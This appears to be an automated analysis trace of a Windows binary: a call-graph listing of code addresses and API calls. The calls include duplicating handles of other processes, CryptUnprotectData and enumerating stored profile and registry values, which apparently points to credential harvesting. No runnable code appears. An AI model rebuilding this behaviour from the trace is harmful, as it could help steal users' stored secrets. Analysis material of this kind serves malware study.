38997->39035 39000 40e5c4 CloseHandle 38998->39000 39001 40e5cc 38998->39001 39000->39001 39003 40b633 free 39001->39003 39002 40e573 39004 40e584 39002->39004 39005 40e57c CloseHandle 39002->39005 39006 40e5db 39003->39006 39078 40b1ab free free 39004->39078 39005->39004 39008 40b633 free 39006->39008 39009 40e5e3 39008->39009 39009->38986 39011 40e540 39011->39002 39055 40e2ab 39011->39055 39079 406214 39012->39079 39015 40e16b 39015->38997 39018 40afcf 2 API calls 39019 40e08d OpenProcess 39018->39019 39020 40e0a4 GetCurrentProcess DuplicateHandle 39019->39020 39024 40e152 39019->39024 39021 40e0d0 GetFileSize 39020->39021 39022 40e14a CloseHandle 39020->39022 39115 409a45 GetTempPathW 39021->39115 39022->39024 39023 40e160 39027 40b04b ??3@YAXPAX 39023->39027 39024->39023 39026 406214 22 API calls 39024->39026 39026->39023 39027->39015 39028 40e0ea 39118 4096dc CreateFileW 39028->39118 39030 40e0f1 CreateFileMappingW 39031 40e140 CloseHandle CloseHandle 39030->39031 39032 40e10b MapViewOfFile 39030->39032 39031->39022 39033 40e13b CloseHandle 39032->39033 39034 40e11f WriteFile UnmapViewOfFile 39032->39034 39033->39031 39034->39033 39036 40e18c 39035->39036 39119 406b90 39036->39119 39039 40e1a7 memset 39045 40e1e8 39039->39045 39040 40e299 39151 4069a3 39040->39151 39046 40e283 39045->39046 39047 40dd50 _wcsicmp 39045->39047 39053 40e244 _snwprintf 39045->39053 39129 406e8f 39045->39129 39158 40742e 8 API calls 39045->39158 39159 40aae3 wcslen wcslen _memicmp 39045->39159 39160 406b53 SetFilePointerEx ReadFile 39045->39160 39048 40e291 39046->39048 39049 40e288 free 39046->39049 39047->39045 39050 40aa04 free 39048->39050 39049->39048 39050->39040 39054 40a8d0 7 API calls 39053->39054 39054->39045 39056 40e2c2 39055->39056 39057 406b90 11 API calls 39056->39057 39058 40e2d3 39057->39058 39059 40e4a0 39058->39059 39061 406e8f 13 API calls 39058->39061 39064 40e489 39058->39064 39067 40dd50 _wcsicmp 39058->39067 39073 40e3e0 memcpy 39058->39073 39074 40e3fb memcpy 39058->39074 39075 40e3b3 wcschr 39058->39075 39076 40e416 memcpy 39058->39076 39077 40e431 memcpy 39058->39077 39161 40dd50 _wcsicmp 39058->39161 39170 40742e 8 API calls 39058->39170 39171 406b53 SetFilePointerEx ReadFile 39058->39171 39060 4069a3 2 API calls 39059->39060 39062 40e4ab 39060->39062 39061->39058 39062->39011 39065 40aa04 free 39064->39065 39066 40e491 39065->39066 39066->39059 39068 40e497 free 39066->39068 39067->39058 39068->39059 39070 40e376 memset 39162 40aa29 39070->39162 39073->39058 39074->39058 39075->39058 39076->39058 39077->39058 39078->38993 39080 406294 CloseHandle 39079->39080 39081 406224 39080->39081 39082 4096c3 CreateFileW 39081->39082 39083 40622d 39082->39083 39084 406281 GetLastError 39083->39084 39085 40a2ef ReadFile 39083->39085 39087 40625a 39084->39087 39086 406244 39085->39086 39086->39084 39088 40624b 39086->39088 39087->39015 39090 40dd85 memset 39087->39090 39088->39087 39089 406777 19 API calls 39088->39089 39089->39087 39091 409bca GetModuleFileNameW 39090->39091 39092 40ddbe CreateFileW 39091->39092 39095 40ddf1 39092->39095 39093 40afcf ??2@YAPAXI ??3@YAXPAX 39093->39095 39094 41352f 9 API calls 39094->39095 39095->39093 39095->39094 39096 40de0b NtQuerySystemInformation 39095->39096 39097 40de3b CloseHandle GetCurrentProcessId 39095->39097 39096->39095 39098 40de54 39097->39098 39099 413d4c 46 API calls 39098->39099 39107 40de88 39099->39107 39100 40e00c 39101 413d29 free FreeLibrary 39100->39101 39102 40e014 39101->39102 39102->39015 39102->39018 39103 40dea9 _wcsicmp 39104 40dee7 OpenProcess 39103->39104 39105 40debd _wcsicmp 39103->39105 39104->39107 39105->39104 39106 40ded0 _wcsicmp 39105->39106 39106->39104 39106->39107 39107->39100 39107->39103 39108 40dfef CloseHandle 39107->39108 39109 40df78 39107->39109 39110 40df23 GetCurrentProcess DuplicateHandle 39107->39110 39113 40df8f CloseHandle 39107->39113 39108->39107 39109->39108 39109->39113 39114 40dfae _wcsicmp 39109->39114 39110->39107 39111 40df4c memset 39110->39111 39112 41352f 9 API calls 39111->39112 39112->39107 39113->39109 39114->39107 39114->39109 39116 409a74 GetTempFileNameW 39115->39116 39117 409a66 GetWindowsDirectoryW 39115->39117 39116->39028 39117->39116 39118->39030 39120 406bd5 39119->39120 39121 406bad 39119->39121 39123 4066bf free malloc memcpy free free 39120->39123 39128 406c0f 39120->39128 39121->39120 39122 406bba _wcsicmp 39121->39122 39122->39120 39122->39121 39124 406be5 39123->39124 39125 40afcf ??2@YAPAXI ??3@YAXPAX 39124->39125 39124->39128 39126 406bff 39125->39126 39127 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39126->39127 39127->39128 39128->39039 39128->39040 39131 406ed1 39129->39131 39130 407424 39130->39045 39131->39130 39132 40b633 free 39131->39132 39140 406f4e 39132->39140 39133 406f73 memset 39133->39140 39134 407080 free 39134->39140 39135 40718b 39137 4069df memcpy 39135->39137 39149 40730b 39135->39149 39136 4099f4 malloc memcpy free 39136->39140 39150 4071f1 39137->39150 39138 4069df memcpy 39138->39140 39139 4069df memcpy 39142 4070d4 39139->39142 39140->39133 39140->39134 39140->39136 39140->39138 39141 406aa2 memcpy 39140->39141 39140->39142 39143 406a10 memcpy 39140->39143 39141->39140 39142->39130 39142->39135 39142->39139 39145 40717b 39142->39145 39143->39140 39144 4069df memcpy 39144->39150 39146 4069df memcpy 39145->39146 39146->39135 39147 406c5a 6 API calls 39147->39149 39148 406c28 ??2@YAPAXI ??3@YAXPAX 39148->39149 39149->39130 39149->39147 39149->39148 39150->39144 39150->39149 39152 4069c4 ??3@YAXPAX 39151->39152 39153 4069af 39152->39153 39154 40b633 free 39153->39154 39155 4069ba 39154->39155 39156 40b04b ??3@YAXPAX 39155->39156 39157 4069c2 39156->39157 39157->39011 39158->39045 39159->39045 39160->39045 39161->39070 39163 40aa33 39162->39163 39164 40aa63 39162->39164 39165 40aa44 39163->39165 39166 40aa38 wcslen 39163->39166 39164->39058 39167 40a9ce malloc memcpy free free 39165->39167 39166->39165 39168 40aa4d 39167->39168 39168->39164 39169 40aa51 memcpy 39168->39169 39169->39164 39170->39058 39171->39058 39176 40a980 39172->39176 39173 40a8bb 39173->38918 39173->38919 39174 40a995 _wcsicmp 39174->39176 39175 40a99c wcscmp 39175->39176 39176->39173 39176->39174 39176->39175 39177->38922 39178->38926 39180 40aa23 RegEnumValueW 39179->39180 39180->38933 39180->38934 39182 405335 39181->39182 39183 40522a 39181->39183 39182->38513 39184 40b2cc 27 API calls 39183->39184 39185 405234 39184->39185 39186 40a804 8 API calls 39185->39186 39187 40523a 39186->39187 39226 40b273 39187->39226 39189 405248 _mbscpy _mbscat GetProcAddress 39190 40b273 27 API calls 39189->39190 39191 405279 39190->39191 39229 405211 GetProcAddress 39191->39229 39193 405282 39194 40b273 27 API calls 39193->39194 39195 40528f 39194->39195 39230 405211 GetProcAddress 39195->39230 39197 405298 39198 40b273 27 API calls 39197->39198 39199 4052a5 39198->39199 39231 405211 GetProcAddress 39199->39231 39201 4052ae 39202 40b273 27 API calls 39201->39202 39203 4052bb 39202->39203 39232 405211 GetProcAddress 39203->39232 39205 4052c4 39206 40b273 27 API calls 39205->39206 39207 4052d1 39206->39207 39233 405211 GetProcAddress 39207->39233 39209 4052da 39210 40b273 27 API calls 39209->39210 39211 4052e7 39210->39211 39234 405211 GetProcAddress 39211->39234 39213 4052f0 39214 40b273 27 API calls 39213->39214 39215 4052fd 39214->39215 39235 405211 GetProcAddress 39215->39235 39217 405306 39218 40b273 27 API calls 39217->39218 39219 405313 39218->39219 39227 40b58d 27 API calls 39226->39227 39228 40b18c 39227->39228 39228->39189 39229->39193 39230->39197 39231->39201 39232->39205 39233->39209 39234->39213 39235->39217 39239 405220 39 API calls 39238->39239 39240 405369 39239->39240 39240->38951 39240->38952 39241->38954 39242->38958 39243->38955 39244->38952 39246 40440c FreeLibrary 39245->39246 39247 40436d 39246->39247 39248 40a804 8 API calls 39247->39248 39249 404377 39248->39249 39250 404383 39249->39250 39251 404405 39249->39251 39252 40b273 27 API calls 39250->39252 39251->38523 39251->38524 39251->38525 39253 40438d GetProcAddress 39252->39253 39254 40b273 27 API calls 39253->39254 39255 4043a7 GetProcAddress 39254->39255 39256 40b273 27 API calls 39255->39256 39257 4043ba GetProcAddress 39256->39257 39258 40b273 27 API calls 39257->39258 39259 4043ce GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4043e2 GetProcAddress 39260->39261 39262 4043f1 39261->39262 39263 4043f7 39262->39263 39264 40440c FreeLibrary 39262->39264 39263->39251 39264->39251 39266 404413 FreeLibrary 39265->39266 39267 40441e 39265->39267 39266->39267 39267->38540 39268->38536 39270 40447e 39269->39270 39271 40442e 39269->39271 39272 404485 CryptUnprotectData 39270->39272 39273 40449c 39270->39273 39274 40b2cc 27 API calls 39271->39274 39272->39273 39273->38536 39275 404438 39274->39275 39276 40a804 8 API calls 39275->39276 39277 40443e 39276->39277 39278 404445 39277->39278 39279 404467 39277->39279 39280 40b273 27 API calls 39278->39280 39279->39270 39282 404475 FreeLibrary 39279->39282 39281 40444f GetProcAddress 39280->39281 39281->39279 39283 404460 39281->39283 39282->39270 39283->39279 39285 4135f6 39284->39285 39286 4135eb FreeLibrary 39284->39286 39285->38543 39286->39285 39288 4449c4 39287->39288 39289 444a52 39287->39289 39290 40b2cc 27 API calls 39288->39290 39289->38560 39289->38561 39291 4449cb 39290->39291 39292 40a804 8 API calls 39291->39292 39293 4449d1 39292->39293 39294 40b273 27 API calls 39293->39294 39295 4449dc GetProcAddress 39294->39295 39296 40b273 27 API calls 39295->39296 39297 4449f3 GetProcAddress 39296->39297 39298 40b273 27 API calls 39297->39298 39299 444a04 GetProcAddress 39298->39299 39308->38571 39309->38571 39310->38571 39311->38571 39312->38562 39314 403a29 39313->39314 39328 403bed memset memset 39314->39328 39316 403ae7 39341 40b1ab free free 39316->39341 39318 403a3f memset 39322 403a2f 39318->39322 39319 403aef 39319->38579 39320 40a8d0 7 API calls 39320->39322 39321 409d1f 6 API calls 39321->39322 39322->39316 39322->39318 39322->39320 39322->39321 39323 409b98 GetFileAttributesW 39322->39323 39323->39322 39325 40a051 GetFileTime CloseHandle 39324->39325 39326 4039ca CompareFileTime 39324->39326 39325->39326 39326->38579 39327->38578 39329 414c2e 17 API calls 39328->39329 39330 403c38 39329->39330 39331 409719 2 API calls 39330->39331 39332 403c3f wcscat 39331->39332 39333 414c2e 17 API calls 39332->39333 39334 403c61 39333->39334 39335 409719 2 API calls 39334->39335 39336 403c68 wcscat 39335->39336 39342 403af5 39336->39342 39339 403af5 20 API calls 39340 403c95 39339->39340 39340->39322 39341->39319 39343 403b02 39342->39343 39344 40ae18 9 API calls 39343->39344 39352 403b37 39344->39352 39345 403bdb 39346 40aebe FindClose 39345->39346 39347 403be6 39346->39347 39347->39339 39348 40ae18 9 API calls 39348->39352 39349 40ae51 9 API calls 39349->39352 39350 40add4 wcscmp wcscmp 39350->39352 39351 40aebe FindClose 39351->39352 39352->39345 39352->39348 39352->39349 39352->39350 39352->39351 39353 40a8d0 7 API calls 39352->39353 39353->39352 39355 409d1f 6 API calls 39354->39355 39356 404190 39355->39356 39369 409b98 GetFileAttributesW 39356->39369 39358 40419c 39359 4041a7 6 API calls 39358->39359 39360 40435c 39358->39360 39361 40424f 39359->39361 39360->38605 39361->39360 39363 40425e memset 39361->39363 39365 409d1f 6 API calls 39361->39365 39366 40a8ab 9 API calls 39361->39366 39370 414842 39361->39370 39363->39361 39364 404296 wcscpy 39363->39364 39364->39361 39365->39361 39367 4042b6 memset memset _snwprintf wcscpy 39366->39367 39367->39361 39368->38603 39369->39358 39373 41443e 39370->39373 39372 414866 39372->39361 39374 41444b 39373->39374 39375 414451 39374->39375 39376 4144a3 GetPrivateProfileStringW 39374->39376 39377 414491 39375->39377 39378 414455 wcschr 39375->39378 39376->39372 39380 414495 WritePrivateProfileStringW 39377->39380 39378->39377 39379 414463 _snwprintf 39378->39379 39379->39380 39380->39372 39381->38609 39383 40b2cc 27 API calls 39382->39383 39384 409615 39383->39384 39385 409d1f 6 API calls 39384->39385 39386 409625 39385->39386 39411 409b98 GetFileAttributesW 39386->39411 39388 409634 39389 409648 39388->39389 39412 4091b8 memset 39388->39412 39391 40b2cc 27 API calls 39389->39391 39394 408801 39389->39394 39392 40965d 39391->39392 39393 409d1f 6 API calls 39392->39393 39395 40966d 39393->39395 39394->38612 39394->38639 39464 409b98 GetFileAttributesW 39395->39464 39397 40967c 39397->39394 39398 409681 39397->39398 39465 409529 72 API calls 39398->39465 39400 409690 39400->39394 39411->39388 39466 40a6e6 WideCharToMultiByte 39412->39466 39414 409202 39467 444432 39414->39467 39417 40b273 27 API calls 39418 409236 39417->39418 39513 438552 39418->39513 39444 40951d 39444->39389 39464->39397 39465->39400 39466->39414 39468 4438b5 11 API calls 39467->39468 39469 44444c 39468->39469 39470 409215 39469->39470 39563 415a6d 39469->39563 39470->39417 39470->39444 39472 4442e6 11 API calls 39474 44469e 39472->39474 39473 444486 39475 4444b9 memcpy 39473->39475 39512 4444a4 39473->39512 39474->39470 39477 443d90 111 API calls 39474->39477 39567 415258 39475->39567 39477->39470 39478 444524 39479 444541 39478->39479 39480 44452a 39478->39480 39570 444316 39479->39570 39481 416935 16 API calls 39480->39481 39481->39512 39512->39472 39684 438460 39513->39684 39564 415a77 39563->39564 39565 415a8d 39564->39565 39566 415a7e memset 39564->39566 39565->39473 39566->39565 39568 4438b5 11 API calls 39567->39568 39569 41525d 39568->39569 39569->39478 39571 444328 39570->39571 39696 41703f 39684->39696 39686 43847a 39687 43848a 39686->39687 39688 43847e 39686->39688 39703 438270 39687->39703 39733 4446ea 11 API calls 39688->39733 39695 438488 39697 417044 39696->39697 39698 41705c 39696->39698 39700 416760 11 API calls 39697->39700 39702 417055 39697->39702 39699 417075 39698->39699 39701 41707a 11 API calls 39698->39701 39699->39686 39700->39702 39701->39697 39702->39686 39704 415a91 memset 39703->39704 39733->39695 39834 413f4f 39807->39834 39810 413f37 K32GetModuleFileNameExW 39811 413f4a 39810->39811 39811->38672 39813 413969 wcscpy 39812->39813 39814 41396c wcschr 39812->39814 39824 413a3a 39813->39824 39814->39813 39816 41398e 39814->39816 39839 4097f7 wcslen wcslen _memicmp 39816->39839 39818 41399a 39819 4139a4 memset 39818->39819 39820 4139e6 39818->39820 39840 409dd5 GetWindowsDirectoryW wcscpy 39819->39840 39822 413a31 wcscpy 39820->39822 39823 4139ec memset 39820->39823 39822->39824 39841 409dd5 GetWindowsDirectoryW wcscpy 39823->39841 39824->38672 39825 4139c9 wcscpy wcscat 39825->39824 39827 413a11 memcpy wcscat 39827->39824 39829 413cb0 GetModuleHandleW 39828->39829 39830 413cda 39828->39830 39829->39830 39833 413cbf GetProcAddress 39829->39833 39831 413ce3 GetProcessTimes 39830->39831 39832 413cf6 39830->39832 39831->38674 39832->38674 39833->39830 39835 413f2f 39834->39835 39836 413f54 39834->39836 39835->39810 39835->39811 39837 40a804 8 API calls 39836->39837 39838 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39837->39838 39838->39835 39839->39818 39840->39825 39841->39827 39842->38694 39843->38717 39845 409cf9 GetVersionExW 39844->39845 39846 409d0a 39844->39846 39845->39846 39846->38723 39846->38729 39847->38730 39848->38734 39849->38736 39850->38802 39852 40bba5 39851->39852 39896 40cc26 39852->39896 39855 40bd4b 39917 40cc0c 39855->39917 39860 40b2cc 27 API calls 39861 40bbef 39860->39861 39924 40ccf0 _wcsicmp 39861->39924 39863 40bbf5 39863->39855 39925 40ccb4 6 API calls 39863->39925 39865 40bc26 39866 40cf04 17 API calls 39865->39866 39867 40bc2e 39866->39867 39868 40bd43 39867->39868 39869 40b2cc 27 API calls 39867->39869 39870 40cc0c 4 API calls 39868->39870 39871 40bc40 39869->39871 39870->39855 39926 40ccf0 _wcsicmp 39871->39926 39873 40bc46 39873->39868 39874 40bc61 memset memset WideCharToMultiByte 39873->39874 39927 40103c strlen 39874->39927 39876 40bcc0 39877 40b273 27 API calls 39876->39877 39878 40bcd0 memcmp 39877->39878 39878->39868 39879 40bce2 39878->39879 39880 404423 38 API calls 39879->39880 39881 40bd10 39880->39881 39881->39868 39882 40bd3a LocalFree 39881->39882 39883 40bd1f memcpy 39881->39883 39882->39868 39883->39882 39884->38817 39885->38854 39886->38854 39887->38854 39888->38854 39889->38854 39890->38854 39891->38854 39892->38854 39893->38854 39894->38829 39895->38851 39928 4096c3 CreateFileW 39896->39928 39898 40cc34 39899 40cc3d GetFileSize 39898->39899 39907 40bbca 39898->39907 39900 40afcf 2 API calls 39899->39900 39901 40cc64 39900->39901 39929 40a2ef ReadFile 39901->39929 39903 40cc71 39930 40ab4a MultiByteToWideChar 39903->39930 39905 40cc95 CloseHandle 39906 40b04b ??3@YAXPAX 39905->39906 39906->39907 39907->39855 39908 40cf04 39907->39908 39909 40b633 free 39908->39909 39910 40cf14 39909->39910 39936 40b1ab free free 39910->39936 39912 40cf1b 39913 40cfef 39912->39913 39916 40bbdd 39912->39916 39937 40cd4b 39912->39937 39915 40cd4b 14 API calls 39913->39915 39915->39916 39916->39855 39916->39860 39918 40b633 free 39917->39918 39919 40cc15 39918->39919 39920 40aa04 free 39919->39920 39921 40cc1d 39920->39921 39978 40b1ab free free 39921->39978 39923 40b7d4 memset CreateFileW 39923->38809 39923->38810 39924->39863 39925->39865 39926->39873 39927->39876 39928->39898 39929->39903 39931 40ab93 39930->39931 39932 40ab6b 39930->39932 39931->39905 39933 40a9ce 4 API calls 39932->39933 39934 40ab74 39933->39934 39935 40ab7c MultiByteToWideChar 39934->39935 39935->39931 39936->39912 39938 40cd7b 39937->39938 39939 40aa29 6 API calls 39938->39939 39943 40cd89 39939->39943 39940 40cef5 39941 40aa04 free 39940->39941 39942 40cefd 39941->39942 39942->39912 39943->39940 39944 40aa29 6 API calls 39943->39944 39945 40ce1d 39944->39945 39946 40aa29 6 API calls 39945->39946 39947 40ce3e 39946->39947 39948 40ce6a 39947->39948 39971 40abb7 wcslen memmove 39947->39971 39949 40ce9f 39948->39949 39974 40abb7 wcslen memmove 39948->39974 39952 40a8d0 7 API calls 39949->39952 39955 40ceb5 39952->39955 39953 40ce56 39972 40aa71 wcslen 39953->39972 39954 40ce8b 39975 40aa71 wcslen 39954->39975 39959 40a8d0 7 API calls 39955->39959 39958 40ce5e 39973 40abb7 wcslen memmove 39958->39973 39962 40cecb 39959->39962 39960 40ce93 39976 40abb7 wcslen memmove 39960->39976 39977 40d00b malloc memcpy free free 39962->39977 39965 40cedd 39966 40aa04 free 39965->39966 39967 40cee5 39966->39967 39968 40aa04 free 39967->39968 39969 40ceed 39968->39969 39970 40aa04 free 39969->39970 39970->39940 39971->39953 39972->39958 39973->39948 39974->39954 39975->39960 39976->39949 39977->39965 39978->39923 39979->38869 39980->38877 39981 442774 39982 442799 39981->39982 39983 44277b 39981->39983 40006 42bf4c 14 API calls 39982->40006 39998 42b63e 39983->39998 39987 4427a5 40007 42bfcf memcpy 39987->40007 39990 4427ba 40008 42c00a 11 API calls 39990->40008 39992 441897 39993 4418ea 39992->39993 39994 442bd4 39992->39994 39995 4418e2 39992->39995 39994->39993 40010 441409 memset 39994->40010 39995->39993 40009 4414a9 12 API calls 39995->40009 40011 42b4ec 39998->40011 40000 42b64c 40017 42b5e4 40000->40017 40002 42b65e 40003 42b66d 40002->40003 40024 42b3c6 11 API calls 40002->40024 40005 42b1b5 17 API calls 40003->40005 40005->39982 40006->39987 40007->39990 40008->39992 40009->39993 40010->39994 40014 42b4ff 40011->40014 40012 415a91 memset 40013 42b52c 40012->40013 40015 42b553 memcpy 40013->40015 40016 42b545 40013->40016 40014->40012 40015->40016 40016->40000 40018 42b5eb 40017->40018 40022 42b604 40017->40022 40025 42b896 memset 40018->40025 40020 42b5f5 40026 42b896 memset 40020->40026 40022->40002 40023 42b5ff 40023->40002 40024->40003 40025->40020 40026->40023 40027 4147f3 40030 414561 40027->40030 40029 414813 40031 41456d 40030->40031 40032 41457f GetPrivateProfileIntW 40030->40032 40035 4143f1 memset _itow WritePrivateProfileStringW 40031->40035 40032->40029 40034 41457a 40034->40029 40035->40034 40036 44def7 40037 44df07 40036->40037 40038 44df00 ??3@YAXPAX 40036->40038 40039 44df17 40037->40039 40040 44df10 ??3@YAXPAX 40037->40040 40038->40037 40041 44df27 40039->40041 40042 44df20 ??3@YAXPAX 40039->40042 40040->40039 40043 44df37 40041->40043 40044 44df30 ??3@YAXPAX 40041->40044 40042->40041 40044->40043 40045 4148b6 FindResourceW 40046 4148cf SizeofResource 40045->40046 40049 4148f9 40045->40049 40047 4148e0 LoadResource 40046->40047 40046->40049 40048 4148ee LockResource 40047->40048 40047->40049 40048->40049 40050 441b3f 40060 43a9f6 40050->40060 40052 441b61 40233 4386af memset 40052->40233 40054 44189a 40055 442bd4 40054->40055 40056 4418e2 40054->40056 40057 4418ea 40055->40057 40235 441409 memset 40055->40235 40056->40057 40234 4414a9 12 API calls 40056->40234 40061 43aa20 40060->40061 40062 43aadf 40060->40062 40061->40062 40063 43aa34 memset 40061->40063 40062->40052 40064 43aa56 40063->40064 40065 43aa4d 40063->40065 40236 43a6e7 40064->40236 40244 42c02e memset 40065->40244 40070 43aad3 40246 4169a7 11 API calls 40070->40246 40071 43aaae 40071->40062 40071->40070 40086 43aae5 40071->40086 40073 43ac18 40075 43ac47 40073->40075 40248 42bbd5 memcpy memcpy memcpy memset memcpy 40073->40248 40076 43aca8 40075->40076 40249 438eed 16 API calls 40075->40249 40080 43acd5 40076->40080 40251 4233ae 11 API calls 40076->40251 40079 43ac87 40250 4233c5 16 API calls 40079->40250 40252 423426 11 API calls 40080->40252 40084 43ace1 40253 439811 164 API calls 40084->40253 40085 43a9f6 162 API calls 40085->40086 40086->40062 40086->40073 40086->40085 40247 439bbb 22 API calls 40086->40247 40088 43acfd 40094 43ad2c 40088->40094 40254 438eed 16 API calls 40088->40254 40090 43ad19 40255 4233c5 16 API calls 40090->40255 40092 43ad58 40256 44081d 164 API calls 40092->40256 40094->40092 40096 43add9 40094->40096 40096->40096 40260 423426 11 API calls 40096->40260 40097 43ae3a memset 40098 43ae73 40097->40098 40261 42e1c0 148 API calls 40098->40261 40099 43adab 40258 438c4e 164 API calls 40099->40258 40101 43ad6c 40101->40062 40101->40099 40257 42370b memset memcpy memset 40101->40257 40103 43ae96 40262 42e1c0 148 API calls 40103->40262 40105 43adcc 40259 440f84 12 API calls 40105->40259 40108 43aea8 40109 43aec1 40108->40109 40263 42e199 148 API calls 40108->40263 40111 43af00 40109->40111 40264 42e1c0 148 API calls 40109->40264 40111->40062 40114 43af1a 40111->40114 40115 43b3d9 40111->40115 40265 438eed 16 API calls 40114->40265 40120 43b3f6 40115->40120 40127 43b4c8 40115->40127 40117 43b60f 40117->40062 40324 4393a5 17 API calls 40117->40324 40118 43af2f 40266 4233c5 16 API calls 40118->40266 40306 432878 12 API calls 40120->40306 40122 43af51 40267 423426 11 API calls 40122->40267 40125 43af7d 40268 423426 11 API calls 40125->40268 40126 43b4f2 40313 43a76c 21 API calls 40126->40313 40127->40126 40312 42bbd5 memcpy memcpy memcpy memset memcpy 40127->40312 40131 43b529 40314 44081d 164 API calls 40131->40314 40132 43b428 40160 43b462 40132->40160 40307 432b60 16 API calls 40132->40307 40133 43af94 40269 423330 11 API calls 40133->40269 40137 43b47e 40146 43b497 40137->40146 40309 42374a memcpy memset memcpy memcpy memcpy 40137->40309 40138 43b544 40148 43b55c 40138->40148 40315 42c02e memset 40138->40315 40139 43afca 40270 423330 11 API calls 40139->40270 40144 43afdb 40271 4233ae 11 API calls 40144->40271 40310 4233ae 11 API calls 40146->40310 40147 43b4b1 40311 423399 11 API calls 40147->40311 40316 43a87a 164 API calls 40148->40316 40150 43b56c 40153 43b58a 40150->40153 40317 423330 11 API calls 40150->40317 40152 43afee 40272 44081d 164 API calls 40152->40272 40318 440f84 12 API calls 40153->40318 40155 43b4c1 40320 42db80 164 API calls 40155->40320 40159 43b592 40319 43a82f 16 API calls 40159->40319 40308 423330 11 API calls 40160->40308 40163 43b5b4 40321 438c4e 164 API calls 40163->40321 40165 43b5cf 40322 42c02e memset 40165->40322 40167 43b005 40167->40062 40172 43b01f 40167->40172 40273 42d836 164 API calls 40167->40273 40168 43b1ef 40283 4233c5 16 API calls 40168->40283 40170 43b212 40284 423330 11 API calls 40170->40284 40172->40168 40281 423330 11 API calls 40172->40281 40282 42d71d 164 API calls 40172->40282 40174 43add4 40174->40117 40323 438f86 16 API calls 40174->40323 40177 43b087 40274 4233ae 11 API calls 40177->40274 40178 43b22a 40285 42ccb5 11 API calls 40178->40285 40181 43b10f 40277 423330 11 API calls 40181->40277 40182 43b23f 40286 4233ae 11 API calls 40182->40286 40184 43b257 40287 4233ae 11 API calls 40184->40287 40188 43b129 40278 4233ae 11 API calls 40188->40278 40189 43b26e 40288 4233ae 11 API calls 40189->40288 40191 43b09a 40191->40181 40275 42cc15 19 API calls 40191->40275 40276 4233ae 11 API calls 40191->40276 40193 43b282 40289 43a87a 164 API calls 40193->40289 40195 43b13c 40279 440f84 12 API calls 40195->40279 40197 43b29d 40290 423330 11 API calls 40197->40290 40200 43b15f 40280 4233ae 11 API calls 40200->40280 40201 43b2af 40203 43b2b8 40201->40203 40204 43b2ce 40201->40204 40291 4233ae 11 API calls 40203->40291 40292 440f84 12 API calls 40204->40292 40207 43b2c9 40294 4233ae 11 API calls 40207->40294 40208 43b2da 40293 42370b memset memcpy memset 40208->40293 40211 43b2f9 40295 423330 11 API calls 40211->40295 40213 43b30b 40296 423330 11 API calls 40213->40296 40215 43b325 40297 423399 11 API calls 40215->40297 40217 43b332 40298 4233ae 11 API calls 40217->40298 40219 43b354 40299 423399 11 API calls 40219->40299 40221 43b364 40300 43a82f 16 API calls 40221->40300 40223 43b370 40301 42db80 164 API calls 40223->40301 40225 43b380 40302 438c4e 164 API calls 40225->40302 40227 43b39e 40303 423399 11 API calls 40227->40303 40229 43b3ae 40304 43a76c 21 API calls 40229->40304 40231 43b3c3 40305 423399 11 API calls 40231->40305 40233->40054 40234->40057 40235->40055 40237 43a6f5 40236->40237 40238 43a765 40236->40238 40237->40238 40325 42a115 40237->40325 40238->40062 40245 4397fd memset 40238->40245 40242 43a73d 40242->40238 40243 42a115 148 API calls 40242->40243 40243->40238 40244->40064 40245->40071 40246->40062 40247->40086 40248->40075 40249->40079 40250->40076 40251->40080 40252->40084 40253->40088 40254->40090 40255->40094 40256->40101 40257->40099 40258->40105 40259->40174 40260->40097 40261->40103 40262->40108 40263->40109 40264->40109 40265->40118 40266->40122 40267->40125 40268->40133 40269->40139 40270->40144 40271->40152 40272->40167 40273->40177 40274->40191 40275->40191 40276->40191 40277->40188 40278->40195 40279->40200 40280->40172 40281->40172 40282->40172 40283->40170 40284->40178 40285->40182 40286->40184 40287->40189 40288->40193 40289->40197 40290->40201 40291->40207 40292->40208 40293->40207 40294->40211 40295->40213 40296->40215 40297->40217 40298->40219 40299->40221 40300->40223 40301->40225 40302->40227 40303->40229 40304->40231 40305->40174 40306->40132 40307->40160 40308->40137 40309->40146 40310->40147 40311->40155 40312->40126 40313->40131 40314->40138 40315->40148 40316->40150 40317->40153 40318->40159 40319->40155 40320->40163 40321->40165 40322->40174 40323->40117 40324->40062 40326 42a175 40325->40326 40328 42a122 40325->40328 40326->40238 40331 42b13b 148 API calls 40326->40331 40328->40326 40329 42a115 148 API calls 40328->40329 40332 43a174 40328->40332 40356 42a0a8 148 API calls 40328->40356 40329->40328 40331->40242 40346 43a196 40332->40346 40347 43a19e 40332->40347 40333 43a306 40333->40346 40372 4388c4 14 API calls 40333->40372 40336 42a115 148 API calls 40336->40347 40337 415a91 memset 40337->40347 40338 43a642 40338->40346 40375 4169a7 11 API calls 40338->40375 40342 43a635 40374 42c02e memset 40342->40374 40346->40328 40347->40333 40347->40336 40347->40337 40347->40346 40357 42ff8c 40347->40357 40365 4165ff 40347->40365 40368 439504 13 API calls 40347->40368 40369 4312d0 148 API calls 40347->40369 40370 42be4c memcpy memcpy memcpy memset memcpy 40347->40370 40371 43a121 11 API calls 40347->40371 40349 43a325 40349->40338 40349->40342 40349->40346 40350 4169a7 11 API calls 40349->40350 40351 42b5b5 memset memcpy 40349->40351 40352 42bf4c 14 API calls 40349->40352 40353 42b63e 14 API calls 40349->40353 40355 4165ff 11 API calls 40349->40355 40373 42bfcf memcpy 40349->40373 40350->40349 40351->40349 40352->40349 40353->40349 40355->40349 40356->40328 40376 43817e 40357->40376 40359 42ff99 40360 42ffe3 40359->40360 40361 42ffd0 40359->40361 40364 42ff9d 40359->40364 40381 4169a7 11 API calls 40360->40381 40380 4169a7 11 API calls 40361->40380 40364->40347 40366 4165a0 11 API calls 40365->40366 40367 41660d 40366->40367 40367->40347 40368->40347 40369->40347 40370->40347 40371->40347 40372->40349 40373->40349 40374->40338 40375->40346 40377 438187 40376->40377 40379 438192 40376->40379 40382 4380f6 40377->40382 40379->40359 40380->40364 40381->40364 40384 43811f 40382->40384 40383 438164 40383->40379 40384->40383 40386 4300e8 3 API calls 40384->40386 40387 437e5e 40384->40387 40386->40384 40410 437d3c 40387->40410 40389 437eb3 40389->40384 40390 437ea9 40390->40389 40396 437f22 40390->40396 40425 41f432 40390->40425 40393 437f06 40473 415c56 11 API calls 40393->40473 40395 437f95 40474 415c56 11 API calls 40395->40474 40397 437f7f 40396->40397 40398 432d4e 3 API calls 40396->40398 40397->40395 40400 43802b 